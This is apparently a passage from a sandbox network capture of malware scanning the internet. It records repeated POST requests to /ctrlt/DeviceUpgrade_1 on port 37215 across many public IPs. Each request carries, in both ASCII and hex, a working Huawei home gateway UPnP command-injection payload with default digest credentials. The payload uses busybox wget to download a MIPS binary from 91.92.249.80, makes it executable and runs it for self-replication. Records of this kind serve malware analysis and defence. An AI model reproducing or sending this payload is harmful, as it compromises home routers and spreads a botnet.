                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          688192.168.2.2359310181.234.43.14237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216377974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          689192.168.2.2334618126.193.138.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216382027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          690192.168.2.2336656157.54.217.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216387987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          691192.168.2.235939041.242.32.10237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216399908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          692192.168.2.2345662157.148.225.16237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216399908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          693192.168.2.2357688157.26.39.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216406107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          694192.168.2.234225671.29.30.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216550112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          695192.168.2.2348734163.219.178.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216556072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          696192.168.2.234671241.228.29.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216561079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          697192.168.2.2346390197.149.118.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216576099 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          698192.168.2.235279024.154.24.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.216588974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
